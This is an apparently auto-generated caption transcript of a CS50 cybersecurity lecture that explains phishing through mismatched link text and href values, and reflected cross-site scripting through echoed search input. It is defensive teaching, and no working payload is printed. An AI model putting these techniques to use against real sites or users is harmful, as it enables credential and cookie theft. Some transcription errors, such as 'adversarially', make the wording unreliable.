1 00:00:00,000 --> 00:00:02,982 [MUSIC PLAYING] 2 00:00:02,982 --> 00:00:17,407 3 00:00:17,407 --> 00:00:18,490 DAVID J. MALAN: All right. 4 00:00:18,490 --> 00:00:21,620 This is CS50's Introduction to Cybersecurity. 5 00:00:21,620 --> 00:00:22,690 My name is David Malan. 6 00:00:22,690 --> 00:00:25,310 And this week, let's focus on securing software, 7 00:00:25,310 --> 00:00:27,670 whether it's the software you use or whether it's 8 00:00:27,670 --> 00:00:29,710 the software you write as a programmer. 9 00:00:29,710 --> 00:00:32,680 Consider, for instance, one of our topics from earlier in the class, 10 00:00:32,680 --> 00:00:36,100 namely, phishing, this attempt by an adversarially to phish or obtain 11 00:00:36,100 --> 00:00:37,600 information from you. 12 00:00:37,600 --> 00:00:41,950 Let's consider today how you might go about implementing this kind of attack, 13 00:00:41,950 --> 00:00:44,470 and equivalently, how you, as the user, might 14 00:00:44,470 --> 00:00:47,120 go about noticing an attack like this. 15 00:00:47,120 --> 00:00:51,550 Well, here, again, is a language called HTML, Hypertext Markup Language. 16 00:00:51,550 --> 00:00:53,770 And it's the language in which web pages are written. 17 00:00:53,770 --> 00:00:56,650 This is maybe the simplest example that we could put together 18 00:00:56,650 --> 00:01:02,020 that represents the kind of text that a web server would send to a web browser 19 00:01:02,020 --> 00:01:05,140 when it wants to display information on your screen, 20 00:01:05,140 --> 00:01:09,160 be it the day's news, your email inbox, or anything else that is web based. 21 00:01:09,160 --> 00:01:12,310 Dot, dot, dot is where I've put placeholders just to represent where 22 00:01:12,310 --> 00:01:16,150 some additional code might actually go, like the content of this actual web 23 00:01:16,150 --> 00:01:16,660 page. 24 00:01:16,660 --> 00:01:22,850 Well, for instance, suppose that we consider in the abstract just a simple 25 00:01:22,850 --> 00:01:25,040 example of the so so-called tags. 26 00:01:25,040 --> 00:01:28,220 And in fact, recall that everything that you just saw sort of 27 00:01:28,220 --> 00:01:31,670 had these open brackets, but also the same words again and again. 28 00:01:31,670 --> 00:01:35,840 For instance, if we wanted to have a paragraph in this language called HTML, 29 00:01:35,840 --> 00:01:40,290 we would have this thing here called a tag, or an open tag, or a start tag, 30 00:01:40,290 --> 00:01:44,000 and then this thing here at the end, an end tag or a close tag. 31 00:01:44,000 --> 00:01:46,190 And those are meant typically to be symmetric. 32 00:01:46,190 --> 00:01:48,900 This one begins a thought for the browser. 33 00:01:48,900 --> 00:01:50,760 Hey, browser, here comes a paragraph. 34 00:01:50,760 --> 00:01:54,560 And this one here with the forward inside of those angled brackets 35 00:01:54,560 --> 00:01:57,510 means hey, browser, that's it for the paragraph. 36 00:01:57,510 --> 00:02:01,460 So any time you see HTML in a file, it's really 37 00:02:01,460 --> 00:02:04,880 telling the browser what to start doing and what to stop doing. 38 00:02:04,880 --> 00:02:07,340 So here is how a browser, therefore, might 39 00:02:07,340 --> 00:02:10,460 know that it needs to display a paragraph of text, maybe separated 40 00:02:10,460 --> 00:02:13,370 by some whitespace by other paragraphs of text. 41 00:02:13,370 --> 00:02:15,410 Here, for instance, is how a browser might 42 00:02:15,410 --> 00:02:19,040 know that there's some code inside of the web page, typically written 43 00:02:19,040 --> 00:02:20,720 in a language called JavaScript. 44 00:02:20,720 --> 00:02:25,890 So this script tag opening here and this close script tag here would be hey, 45 00:02:25,890 --> 00:02:27,530 browser, here's some code to execute. 46 00:02:27,530 --> 00:02:28,220 Dot, dot, dot. 47 00:02:28,220 --> 00:02:31,620 And hey, browser, that's it for the code to execute. 48 00:02:31,620 --> 00:02:35,960 So how might there actually be a threat or an opportunity 49 00:02:35,960 --> 00:02:38,930 here for an adversarially to phish information from you? 50 00:02:38,930 --> 00:02:41,750 Well, here, for instance, is how you might in this language 51 00:02:41,750 --> 00:02:46,130 called HTML create a link, otherwise known as a hyperlink in a web page. 52 00:02:46,130 --> 00:02:48,620 And it, too, uses an open tag and a close tag. 53 00:02:48,620 --> 00:02:52,490 This A tag represents an anchor, like anchor, some hyperlink, 54 00:02:52,490 --> 00:02:54,590 some link in the web page right here. 55 00:02:54,590 --> 00:02:57,600 And this tag here means, OK, that's it for the link. 56 00:02:57,600 --> 00:03:00,410 And if we want a link, for instance, to Harvard's website 57 00:03:00,410 --> 00:03:03,170 in between that open tag and close tag would 58 00:03:03,170 --> 00:03:07,050 you actually put the text of what the link is meant to be. 59 00:03:07,050 --> 00:03:10,040 So if you want the user to see a link on the page that says Harvard, 60 00:03:10,040 --> 00:03:13,610 you would put literally Harvard between this open tag and close tag. 61 00:03:13,610 --> 00:03:17,150 But that's not actually enough to link to some other page. 62 00:03:17,150 --> 00:03:22,310 You have to tell the browser what URL or what file you want clicking on Harvard 63 00:03:22,310 --> 00:03:24,170 to actually lead the user to. 64 00:03:24,170 --> 00:03:27,860 So for that, we need to introduce one other concept in this language called 65 00:03:27,860 --> 00:03:30,390 HTML, namely, an attribute. 66 00:03:30,390 --> 00:03:33,200 So h href stands for hyper-reference. 67 00:03:33,200 --> 00:03:35,600 And it's a fancy way of saying, this is what 68 00:03:35,600 --> 00:03:39,595 I want the browser to link the user to when they click on that word, Harvard. 69 00:03:39,595 --> 00:03:41,720 Now, at the moment, I've just done a dot, dot, dot. 70 00:03:41,720 --> 00:03:45,800 But that would, for instance, be the URL of Harvard's own website. 71 00:03:45,800 --> 00:03:48,920 So consider this very specific example, now, 72 00:03:48,920 --> 00:03:51,860 whereby, we still have our anchor tag opening here, 73 00:03:51,860 --> 00:03:54,320 we still have our anchor tag closing here. 74 00:03:54,320 --> 00:03:59,180 We now have, though, an href attribute that's telling the browser that when 75 00:03:59,180 --> 00:04:06,620 the word, Harvard is clicked, I want the user to end up at https://harvard.edu. 76 00:04:06,620 --> 00:04:09,110 So that all seems fine and good. 77 00:04:09,110 --> 00:04:12,020 And this is the way the web is supposed to work. 78 00:04:12,020 --> 00:04:15,200 And this is what links in your own web pages 79 00:04:15,200 --> 00:04:17,810 will look like if you poke around underneath the hood. 80 00:04:17,810 --> 00:04:19,490 So where is the actual danger? 81 00:04:19,490 --> 00:04:21,170 Well, hopefully, there is none. 82 00:04:21,170 --> 00:04:24,200 And hopefully, when you open this kind of HTML 83 00:04:24,200 --> 00:04:27,920 in the context of a larger file with even more tags than just 84 00:04:27,920 --> 00:04:30,080 this anchor tag, you'd see a browser window that 85 00:04:30,080 --> 00:04:31,788 looks a little something like this, you'd 86 00:04:31,788 --> 00:04:35,570 see a link typically underlined, though, not necessarily to Harvard. 87 00:04:35,570 --> 00:04:38,810 And then, and only then, if you hover over 88 00:04:38,810 --> 00:04:41,300 that link, can you see where you will go, 89 00:04:41,300 --> 00:04:43,080 even if you don't actually click the link. 90 00:04:43,080 --> 00:04:45,080 So suffice it to say if you just click the link, 91 00:04:45,080 --> 00:04:47,190 you're going to end up on Harvard's own website. 92 00:04:47,190 --> 00:04:51,740 But if you a little more cautiously with a bit more paranoia, a bit more 93 00:04:51,740 --> 00:04:55,340 consciousness now of cybersecurity hover over that link 94 00:04:55,340 --> 00:04:58,760 and focus on your browser's bottom left-hand corner typically, 95 00:04:58,760 --> 00:05:03,260 at least, on a laptop or desktop, you'll actually see the URL to which 96 00:05:03,260 --> 00:05:07,200 you will actually be whisked away when you click on that link. 97 00:05:07,200 --> 00:05:08,630 So this actually looks OK. 98 00:05:08,630 --> 00:05:10,220 The word here is Harvard. 99 00:05:10,220 --> 00:05:15,470 The URL it's going to link me to is https://harvard.edu. 100 00:05:15,470 --> 00:05:18,150 So I think all is well in the world. 101 00:05:18,150 --> 00:05:21,600 And indeed, you can do this on most any web page on your laptop and desktop 102 00:05:21,600 --> 00:05:24,750 if you want to proactively preemptively see 103 00:05:24,750 --> 00:05:28,270 where it is you're going to go before you actually click on that link. 104 00:05:28,270 --> 00:05:29,790 So where's the danger? 105 00:05:29,790 --> 00:05:33,720 Well, let's get a little more specific and a little more malicious, if I may. 106 00:05:33,720 --> 00:05:37,660 So here, we have the exact same HTML as before. 107 00:05:37,660 --> 00:05:42,150 But let's go ahead now and not just say Harvard inside of this open tag 108 00:05:42,150 --> 00:05:42,990 and closed tag. 109 00:05:42,990 --> 00:05:47,430 Suppose that for whatever reason, I want the user to see a little more obviously 110 00:05:47,430 --> 00:05:49,750 the URL to which they are going to be linked. 111 00:05:49,750 --> 00:05:54,060 So I may change Harvard, capital H, to harvard.edu, 112 00:05:54,060 --> 00:05:58,320 so the actual domain name that I want the user to be led to. 113 00:05:58,320 --> 00:06:00,430 Here is now what the user would see. 114 00:06:00,430 --> 00:06:04,500 So it's a little more obvious that it's harvard.edu and not some other Harvard 115 00:06:04,500 --> 00:06:05,070 website. 116 00:06:05,070 --> 00:06:07,050 And indeed, if we hover over that, we'll see 117 00:06:07,050 --> 00:06:10,180 that it still is going to the same URL. 118 00:06:10,180 --> 00:06:10,680 All right. 119 00:06:10,680 --> 00:06:12,000 So that seems fine. 120 00:06:12,000 --> 00:06:13,530 And not all that enlightening. 121 00:06:13,530 --> 00:06:15,090 Let's go one step further. 122 00:06:15,090 --> 00:06:21,080 Suppose that you really want the user to see a URL in the body of the web page, 123 00:06:21,080 --> 00:06:24,925 so now I'm actually going to put in between the open tag and the close tag, 124 00:06:24,925 --> 00:06:28,530 https://harvard.edu. 125 00:06:28,530 --> 00:06:30,280 Now, notice this looks a little redundant. 126 00:06:30,280 --> 00:06:32,110 And it is in some sense because I literally 127 00:06:32,110 --> 00:06:34,600 have the URL in two different places. 128 00:06:34,600 --> 00:06:38,050 But that's because those two values serve different purposes. 129 00:06:38,050 --> 00:06:42,130 The one in between the open tag and close tag is what the human sees. 130 00:06:42,130 --> 00:06:46,720 The one inside of the quote marks, the so-called value of the href attribute, 131 00:06:46,720 --> 00:06:48,830 is where the user will actually end up. 132 00:06:48,830 --> 00:06:50,710 So if you want them to be equivalent, you 133 00:06:50,710 --> 00:06:53,660 have to type the exact same thing twice in this case. 134 00:06:53,660 --> 00:06:55,690 So now, of course, if I go back to the web page, 135 00:06:55,690 --> 00:06:58,750 the human is now going to see literally this URL. 136 00:06:58,750 --> 00:07:03,220 And if they hover before clicking, they'll see confirmation as much. 137 00:07:03,220 --> 00:07:04,970 So where are we going with this? 138 00:07:04,970 --> 00:07:08,350 Well, here is among the lessons of the course is to think about now, 139 00:07:08,350 --> 00:07:12,940 how can you take a perfectly reasonable technical solution to a problem, 140 00:07:12,940 --> 00:07:16,420 creating a link in a page in this case, and how might an adversarially 141 00:07:16,420 --> 00:07:17,140 abuse it? 142 00:07:17,140 --> 00:07:19,540 How might you, as the end user, be vulnerable, 143 00:07:19,540 --> 00:07:22,060 in this case, to a so-called phishing attack? 144 00:07:22,060 --> 00:07:24,280 Well, there's nothing stopping me from putting 145 00:07:24,280 --> 00:07:29,410 anything I want in either this value or in this name of the link. 146 00:07:29,410 --> 00:07:30,335 So you know what? 147 00:07:30,335 --> 00:07:31,960 Why don't I be a little malicious here? 148 00:07:31,960 --> 00:07:35,200 And why don't I tell the user that they're going to harvard.edu, 149 00:07:35,200 --> 00:07:40,910 but they're actually going to yale.edu instead, another school down the road? 150 00:07:40,910 --> 00:07:42,250 So what is the human see now? 151 00:07:42,250 --> 00:07:44,320 If we go back to the browser, they still see 152 00:07:44,320 --> 00:07:48,310 what appears to be https://harvard.edu. 153 00:07:48,310 --> 00:07:51,850 But if they hover over it, and only if they hover over it, 154 00:07:51,850 --> 00:07:54,160 will they see this little clue that, uh-uh, 155 00:07:54,160 --> 00:07:57,070 you're actually going to be whisked away to yale.edu. 156 00:07:57,070 --> 00:08:00,040 And if they click on the link, they'll actually find themselves 157 00:08:00,040 --> 00:08:03,230 at the actual yale.edu website. 158 00:08:03,230 --> 00:08:04,852 So what's the big deal? 159 00:08:04,852 --> 00:08:07,310 Well, this might just be a silly prank, in which case, it's 160 00:08:07,310 --> 00:08:09,020 probably inconsequential. 161 00:08:09,020 --> 00:08:13,350 And if you do link from one website to a completely different one, 162 00:08:13,350 --> 00:08:15,282 it's not necessarily a phishing attack. 163 00:08:15,282 --> 00:08:18,240 It might be confusing because the user thinks they're going to Harvard, 164 00:08:18,240 --> 00:08:19,615 but they find themselves at Yale. 165 00:08:19,615 --> 00:08:22,970 But there's not necessarily any danger in that mislead. 166 00:08:22,970 --> 00:08:25,910 But what if the adversarially in this case 167 00:08:25,910 --> 00:08:30,230 doesn't link to a very common popular website like yale.edu, 168 00:08:30,230 --> 00:08:34,610 but maybe a website like harvard.edu, where just one of the characters 169 00:08:34,610 --> 00:08:37,149 is slightly misspelled, as we've discussed in the past? 170 00:08:37,149 --> 00:08:41,220 Shows that you and I, unless we really, really look carefully, 171 00:08:41,220 --> 00:08:44,480 we might not even notice that we're not at the real harvard.edu. 172 00:08:44,480 --> 00:08:47,300 And what if further, the adversarially went 173 00:08:47,300 --> 00:08:51,080 through the trouble of copying all of the HTML 174 00:08:51,080 --> 00:08:53,930 that implements Harvard's website and pastes it 175 00:08:53,930 --> 00:08:56,960 into their own fake version of Harvard's website 176 00:08:56,960 --> 00:08:59,990 that lives at, again, a URL that is almost the same? 177 00:08:59,990 --> 00:09:02,660 Here is now where there's a phishing opportunity 178 00:09:02,660 --> 00:09:06,350 because if you think you're going to harvard.edu, and you click the link, 179 00:09:06,350 --> 00:09:10,530 and it looks like you're at harvard.edu, and you don't notice a subtlety like, 180 00:09:10,530 --> 00:09:12,950 wait a minute, that's not quite the right URL, 181 00:09:12,950 --> 00:09:17,060 you might now be inclined to and comfortable with maybe logging 182 00:09:17,060 --> 00:09:21,410 in to the fake "harvard.edu" website with your username and your password. 183 00:09:21,410 --> 00:09:25,573 And voila, now the adversarially has that information from you. 184 00:09:25,573 --> 00:09:26,990 And it doesn't have to be Harvard. 185 00:09:26,990 --> 00:09:28,115 It doesn't have to be Yale. 186 00:09:28,115 --> 00:09:29,300 It might be your bank. 187 00:09:29,300 --> 00:09:33,500 It might be paypal.com or something where you could actually lose money 188 00:09:33,500 --> 00:09:36,180 or some other asset you care about. 189 00:09:36,180 --> 00:09:38,990 And so that's really the essence of the implementation 190 00:09:38,990 --> 00:09:43,430 details of a phishing attack, at least, in the context of web pages 191 00:09:43,430 --> 00:09:44,960 and/or emails. 192 00:09:44,960 --> 00:09:48,470 It all boils down to these primitives of HTML 193 00:09:48,470 --> 00:09:50,570 being the language in which web pages are written. 194 00:09:50,570 --> 00:09:54,680 And adversaries, by knowing HTML, also now logically 195 00:09:54,680 --> 00:10:00,150 can misuse HTML by understanding how these basics work. 196 00:10:00,150 --> 00:10:04,790 So let me pause here and see if there's any questions about phishing, or HTML, 197 00:10:04,790 --> 00:10:07,640 or this convergence of the two when it comes 198 00:10:07,640 --> 00:10:11,510 to this form of social engineering, as we called it before. 199 00:10:11,510 --> 00:10:16,730 AUDIENCE: Would it be possible to write my IP or some other means to get 200 00:10:16,730 --> 00:10:20,893 to their website and not the URL's? 201 00:10:20,893 --> 00:10:22,310 DAVID J. MALAN: Short answer, yes. 202 00:10:22,310 --> 00:10:25,365 If you have access to dedicated IP addresses, 203 00:10:25,365 --> 00:10:28,490 which are these unique identifiers you can use for servers on the internet, 204 00:10:28,490 --> 00:10:35,220 you can absolutely have a URL that is http:// and then the IP address. 205 00:10:35,220 --> 00:10:38,660 Now, typically, it would be HTTP and not HTTPS 206 00:10:38,660 --> 00:10:42,170 when using an IP address, in which case, that might be 207 00:10:42,170 --> 00:10:43,940 a clue to the user that wait a minute. 208 00:10:43,940 --> 00:10:46,700 This is making me nervous that this isn't legitimate. 209 00:10:46,700 --> 00:10:49,400 But honestly, I think we can all think of people in our lives 210 00:10:49,400 --> 00:10:52,280 who wouldn't have the instincts to notice, wait a minute. 211 00:10:52,280 --> 00:10:55,130 What is this weird numeric address in my browser bar 212 00:10:55,130 --> 00:10:56,537 and stop what they're doing. 213 00:10:56,537 --> 00:10:58,370 That's, indeed, among the goals of the class 214 00:10:58,370 --> 00:11:00,990 like this is to give you those instincts and that training 215 00:11:00,990 --> 00:11:02,990 to be a little suspicious when you see something 216 00:11:02,990 --> 00:11:05,690 like a raw IP address in the browser. 217 00:11:05,690 --> 00:11:07,490 Technically, there's nothing wrong with it. 218 00:11:07,490 --> 00:11:09,980 But it's a little bit of a weird branding or marketing 219 00:11:09,980 --> 00:11:11,270 decision for a website. 220 00:11:11,270 --> 00:11:13,940 And I think a corollary of this then logically 221 00:11:13,940 --> 00:11:16,160 is that if you are running a website of your own 222 00:11:16,160 --> 00:11:18,830 or if you're running a business with a website of your own, 223 00:11:18,830 --> 00:11:24,200 you should really avoid using many different URL formats, 224 00:11:24,200 --> 00:11:28,070 or many different domains, or having any sort of curiosities 225 00:11:28,070 --> 00:11:31,580 or weirdnesses in your domain names because you're really just teaching 226 00:11:31,580 --> 00:11:35,533 users implicitly that your URL format might change from time to time. 227 00:11:35,533 --> 00:11:38,450 And certainly, you never want to use just an IP address because you're 228 00:11:38,450 --> 00:11:40,800 going to train people to expect that. 229 00:11:40,800 --> 00:11:45,050 And so standardizing on one or very few domain names or subdomains 230 00:11:45,050 --> 00:11:47,670 is generally best for that. 231 00:11:47,670 --> 00:11:49,700 So what are some other attacks that we should 232 00:11:49,700 --> 00:11:52,130 be mindful of when it comes to our own software? 233 00:11:52,130 --> 00:11:55,250 Well, a class of attacks, or a category of attacks, 234 00:11:55,250 --> 00:11:57,500 are generally known as code injection, which 235 00:11:57,500 --> 00:12:01,370 is an opportunity for an adversarially to somehow inject code 236 00:12:01,370 --> 00:12:05,960 into your software and often trick your software into executing that code, 237 00:12:05,960 --> 00:12:08,090 even if you, yourself, didn't write it. 238 00:12:08,090 --> 00:12:10,640 Well, let's consider one example of this. 239 00:12:10,640 --> 00:12:12,740 A common attack on the web in particular, 240 00:12:12,740 --> 00:12:17,780 too, is what's known as cross-site scripting, or XSS for short. 241 00:12:17,780 --> 00:12:21,530 Cross-site scripting refers to this potential opportunity 242 00:12:21,530 --> 00:12:26,390 for an adversarially to trick one website into executing code that they, 243 00:12:26,390 --> 00:12:28,220 again, themselves did not write. 244 00:12:28,220 --> 00:12:30,170 So what form might this actually take? 245 00:12:30,170 --> 00:12:35,510 Well, suppose that you, yourself, visit google.com, and suppose that Google 246 00:12:35,510 --> 00:12:37,370 isn't aware of this particular attack. 247 00:12:37,370 --> 00:12:38,880 They certainly are nowadays. 248 00:12:38,880 --> 00:12:42,690 But suppose that they weren't yet aware that this attack exists. 249 00:12:42,690 --> 00:12:45,980 And so when someone like you or I goes to google.com and searches 250 00:12:45,980 --> 00:12:49,830 for something like cats, suppose they do the following. 251 00:12:49,830 --> 00:12:51,740 They show you a whole page of search results. 252 00:12:51,740 --> 00:12:53,657 And I won't bother showing the actual results. 253 00:12:53,657 --> 00:12:59,660 But as of today, there were 6,420,000,000 cats on the internet 254 00:12:59,660 --> 00:13:00,740 that Google knows about. 255 00:13:00,740 --> 00:13:02,930 And they would show up, of course, down here. 256 00:13:02,930 --> 00:13:07,250 Now, notice a few characteristics about google.com as it typically behaves. 257 00:13:07,250 --> 00:13:11,490 Well, one, you still see a text box containing what it is you searched for, 258 00:13:11,490 --> 00:13:13,890 so that you can change it, or at least, see what it is. 259 00:13:13,890 --> 00:13:17,540 And notice, too, that in smaller text here in this particular version 260 00:13:17,540 --> 00:13:20,750 of Google, it tells you not only how many results there 261 00:13:20,750 --> 00:13:23,810 are, but specifically, how many cats there are. 262 00:13:23,810 --> 00:13:28,430 So that is to say, if Google is using your own input, 263 00:13:28,430 --> 00:13:32,600 not only to remind you of what you searched for in the search box, 264 00:13:32,600 --> 00:13:37,970 but also in the body of the web page, that very simple idea is 265 00:13:37,970 --> 00:13:39,620 vulnerable to an attack. 266 00:13:39,620 --> 00:13:40,160 Why? 267 00:13:40,160 --> 00:13:43,340 Because who wrote the word, cats, C-A-T-S? 268 00:13:43,340 --> 00:13:45,240 Well, it wasn't Google, per se. 269 00:13:45,240 --> 00:13:46,310 It was me. 270 00:13:46,310 --> 00:13:49,440 Now, fortunately, cats, in and of itself, is not dangerous. 271 00:13:49,440 --> 00:13:52,850 But suppose I knew a little something about HTML, and browsers, 272 00:13:52,850 --> 00:13:56,540 and how the internet works, and suppose that I now an adversarially 273 00:13:56,540 --> 00:13:58,190 did something like this. 274 00:13:58,190 --> 00:14:02,360 And knowing that Google is probably inside of their web page 275 00:14:02,360 --> 00:14:05,720 rendering HTML that looks like this, a paragraph of text 276 00:14:05,720 --> 00:14:07,880 per the open paragraph and closed paragraph 277 00:14:07,880 --> 00:14:13,670 tag and an English sentence like this, about 6,420,000,000 cats, if I know 278 00:14:13,670 --> 00:14:18,510 they're putting my input, cats into HTML that looks like this, 279 00:14:18,510 --> 00:14:22,430 let me see if I can try to trick Google into outputting something 280 00:14:22,430 --> 00:14:24,090 that they might not have anticipated. 281 00:14:24,090 --> 00:14:27,170 So instead of cats, let me type something a little weird 282 00:14:27,170 --> 00:14:28,500 that looks like this. 283 00:14:28,500 --> 00:14:29,700 Now, what are we looking at? 284 00:14:29,700 --> 00:14:33,560 We're looking at now an HTML tag, the script tag, 285 00:14:33,560 --> 00:14:37,010 both opened and closed here, and a little bit of code in a language 286 00:14:37,010 --> 00:14:38,030 called JavaScript. 287 00:14:38,030 --> 00:14:41,840 Now, thankfully, this, in and of itself, is not actually a compelling attack. 288 00:14:41,840 --> 00:14:44,360 It's literally just going to display "attack," 289 00:14:44,360 --> 00:14:45,810 quote, unquote, on the screen. 290 00:14:45,810 --> 00:14:50,390 So it's just meant to be representative I claim of how I could potentially 291 00:14:50,390 --> 00:14:54,710 trick a website like Google into executing code that I wrote, 292 00:14:54,710 --> 00:14:56,330 not that they wrote. 293 00:14:56,330 --> 00:14:57,830 So what do I mean by that? 294 00:14:57,830 --> 00:15:00,200 Notice that I've got this open script tag here 295 00:15:00,200 --> 00:15:03,440 and the close script tag here, which means everything in between there 296 00:15:03,440 --> 00:15:06,530 is script, that is JavaScript, this particular language. 297 00:15:06,530 --> 00:15:09,530 Well, it turns out this particular language in the context of browsers 298 00:15:09,530 --> 00:15:12,960 comes with a function, a feature known as alert. 299 00:15:12,960 --> 00:15:15,560 And if you want to alert the user with some message, 300 00:15:15,560 --> 00:15:18,470 you literally write the word, alert and then an open parentheses 301 00:15:18,470 --> 00:15:21,000 and a closed parentheses on the left and right. 302 00:15:21,000 --> 00:15:23,360 And then inside of single quotes or double quotes, 303 00:15:23,360 --> 00:15:27,140 you put whatever word or words that you want to alert the user to. 304 00:15:27,140 --> 00:15:30,740 So this is often used for displaying messages to the user, not 305 00:15:30,740 --> 00:15:32,540 actual attacks, but useful messages. 306 00:15:32,540 --> 00:15:34,620 And there's more elegant ways to do this as well. 307 00:15:34,620 --> 00:15:39,800 But this is the simplest representation of an attack that I could propose here. 308 00:15:39,800 --> 00:15:42,740 Now, I haven't yet hit Enter on this page 309 00:15:42,740 --> 00:15:45,860 because, indeed, we still see that we're on the page relating 310 00:15:45,860 --> 00:15:49,100 to cats as my search result. But as soon as I 311 00:15:49,100 --> 00:15:53,810 hit Enter after searching for this string of JavaScript code, 312 00:15:53,810 --> 00:15:58,430 or really, HTML inside of which is JavaScript code, what might happen? 313 00:15:58,430 --> 00:16:02,330 Well, this could potentially happen. 314 00:16:02,330 --> 00:16:05,420 Now, again, this is not a bad thing in this specific case. 315 00:16:05,420 --> 00:16:07,740 It's just throwing up an alert to the user. 316 00:16:07,740 --> 00:16:10,340 And in this sense, too, I'm really only attacking myself 317 00:16:10,340 --> 00:16:12,770 because if I'm the adversarially, and this is my browser, 318 00:16:12,770 --> 00:16:15,920 and I've just tricked Google into executing some JavaScript code such 319 00:16:15,920 --> 00:16:19,220 that a pop-up appears saying attack, well, I'm just hacking myself. 320 00:16:19,220 --> 00:16:20,570 So this is inconsequential. 321 00:16:20,570 --> 00:16:23,360 But again, it's representative of how we could potentially 322 00:16:23,360 --> 00:16:27,140 trick a website into executing code that they did not intend. 323 00:16:27,140 --> 00:16:29,510 Now, why is this displaying? 324 00:16:29,510 --> 00:16:35,180 But notice no more cats and no input here that I typed myself. 325 00:16:35,180 --> 00:16:38,360 Last time when I searched for cats, I saw the word cats here. 326 00:16:38,360 --> 00:16:41,450 But now I'm seeing nothing at all. 327 00:16:41,450 --> 00:16:42,810 Now, why is that? 328 00:16:42,810 --> 00:16:46,370 Well, underneath the hood previously, I claimed that Google was probably 329 00:16:46,370 --> 00:16:48,920 rendering HTML like this, a paragraph of text, 330 00:16:48,920 --> 00:16:53,720 open tag, close tag, and then the sentence about 6,420,000,000 cats, 331 00:16:53,720 --> 00:16:54,740 so HTML. 332 00:16:54,740 --> 00:16:57,980 And they were just plugging in whatever I, the human, typed in. 333 00:16:57,980 --> 00:17:01,310 Well, this time, I conjecture that if I typed 334 00:17:01,310 --> 00:17:05,589 in what looks like and is HTML with a bit of scary JavaScript 335 00:17:05,589 --> 00:17:08,079 code in between, what Google is probably going 336 00:17:08,079 --> 00:17:12,220 to try to output in the body of the web page they send to my browser 337 00:17:12,220 --> 00:17:15,790 is this, an open paragraph tag and a closed paragraph 338 00:17:15,790 --> 00:17:18,640 tag still the beginning of a sentence, assuming 339 00:17:18,640 --> 00:17:23,260 that there are this many attacks in the world, 6,420,000,000. 340 00:17:23,260 --> 00:17:24,460 But notice this. 341 00:17:24,460 --> 00:17:29,170 Because I, the user, literally typed in the script tag, and the closed script 342 00:17:29,170 --> 00:17:31,510 tag, and then that JavaScript code in between, 343 00:17:31,510 --> 00:17:35,660 the browser doesn't know that that came from me and not Google. 344 00:17:35,660 --> 00:17:37,720 So the browser is just going to read this 345 00:17:37,720 --> 00:17:42,280 as, hey, browser, start a paragraph, about 6,420,000,000. 346 00:17:42,280 --> 00:17:46,330 Hey, browser, here comes a script that is a program that you should execute. 347 00:17:46,330 --> 00:17:47,350 What do I execute? 348 00:17:47,350 --> 00:17:48,910 Alert, quote, unquote, "attack." 349 00:17:48,910 --> 00:17:50,770 Hey, browser, that's it for the script. 350 00:17:50,770 --> 00:17:53,150 Hey, browser, that's it for the paragraph. 351 00:17:53,150 --> 00:17:57,340 So if Google is just blindly copying and pasting what I, the human, 352 00:17:57,340 --> 00:18:00,910 am typing in, I might trick Google into rendering HTML 353 00:18:00,910 --> 00:18:02,720 that Google did not intend. 354 00:18:02,720 --> 00:18:05,850 And the side effect in this case is that I see this alert. 355 00:18:05,850 --> 00:18:11,090 But really, that's indicative of a potential exploit in Google's website 356 00:18:11,090 --> 00:18:15,000 if they were not detecting this on their own. 357 00:18:15,000 --> 00:18:17,060 So this is the code that's dangerous. 358 00:18:17,060 --> 00:18:19,430 And what then is the fundamental problem? 359 00:18:19,430 --> 00:18:24,350 They are just literally outputting what I, the adversarially, 360 00:18:24,350 --> 00:18:26,700 typed in to their page. 361 00:18:26,700 --> 00:18:28,790 So how do we go about mitigating something 362 00:18:28,790 --> 00:18:31,310 like this to avoid this kind of attack? 363 00:18:31,310 --> 00:18:35,060 Well, let's first propose that what we want the effect to be 364 00:18:35,060 --> 00:18:37,040 is something a little more like this. 365 00:18:37,040 --> 00:18:39,572 Assuming, again, that there are 6,420,000,000 366 00:18:39,572 --> 00:18:41,780 attacks in the world, what I want to see is literally 367 00:18:41,780 --> 00:18:43,430 that English sentence here. 368 00:18:43,430 --> 00:18:45,330 I don't want any sort of pop-up. 369 00:18:45,330 --> 00:18:48,650 So this, I would propose, is the correct behavior, 370 00:18:48,650 --> 00:18:51,020 assuming we see more search results down below. 371 00:18:51,020 --> 00:18:52,400 I have searched for this. 372 00:18:52,400 --> 00:18:55,560 Google is telling me or reminding me what I searched for, 373 00:18:55,560 --> 00:18:57,320 but there's no pop-ups in this case. 374 00:18:57,320 --> 00:19:00,260 So somehow or other, based on this screenshot alone, 375 00:19:00,260 --> 00:19:03,530 there must be a way of ensuring on Google's end 376 00:19:03,530 --> 00:19:07,790 that even if the human timescale in HTML with, perhaps, some JavaScript 377 00:19:07,790 --> 00:19:11,930 code in the middle, that they don't actually treat it as HTML 378 00:19:11,930 --> 00:19:13,760 and JavaScript code in the middle. 379 00:19:13,760 --> 00:19:18,440 They just display it literally character by character whatever I, the user, 380 00:19:18,440 --> 00:19:19,290 typed in. 381 00:19:19,290 --> 00:19:21,860 So what is our concern with this particular symptom? 382 00:19:21,860 --> 00:19:23,870 Well, it turns out that an adversarially can 383 00:19:23,870 --> 00:19:26,840 wage what we would call a reflected attack, 384 00:19:26,840 --> 00:19:30,290 whereby, we could leverage this symptom in such a way 385 00:19:30,290 --> 00:19:34,010 that maybe we could construct a URL that if clicked by a user, 386 00:19:34,010 --> 00:19:37,100 actually triggers this kind of behavior, but moreover, 387 00:19:37,100 --> 00:19:40,040 doesn't just trigger this fairly innocuous behavior like alerting 388 00:19:40,040 --> 00:19:42,840 the user with a message like attack just to scare them. 389 00:19:42,840 --> 00:19:46,460 But what if we wrote even more malicious JavaScript code that 390 00:19:46,460 --> 00:19:49,920 maybe steals their cookies or does something more than that? 391 00:19:49,920 --> 00:19:52,520 Well, how do you wage what's called here reflected attack? 392 00:19:52,520 --> 00:19:56,520 Well, let's first consider what a basic link in a web page or an email 393 00:19:56,520 --> 00:19:57,020 looks like. 394 00:19:57,020 --> 00:19:59,490 It's again, an anchor tag that starts and ends. 395 00:19:59,490 --> 00:20:01,790 It has an href attribute that's represents 396 00:20:01,790 --> 00:20:05,450 the URL or file to which we're going to link the user and then some text 397 00:20:05,450 --> 00:20:08,300 that the human will actually see in the web page. 398 00:20:08,300 --> 00:20:12,710 And now let's notice when we correctly search for cats, as we did before, 399 00:20:12,710 --> 00:20:16,250 that not only do we see cats in the text box here, not only do we 400 00:20:16,250 --> 00:20:20,360 see cats in the body of the web page, but notice now the URL. 401 00:20:20,360 --> 00:20:23,510 It turns out when you search for something on Google, 402 00:20:23,510 --> 00:20:26,438 you end up at a URL that looks essentially like this. 403 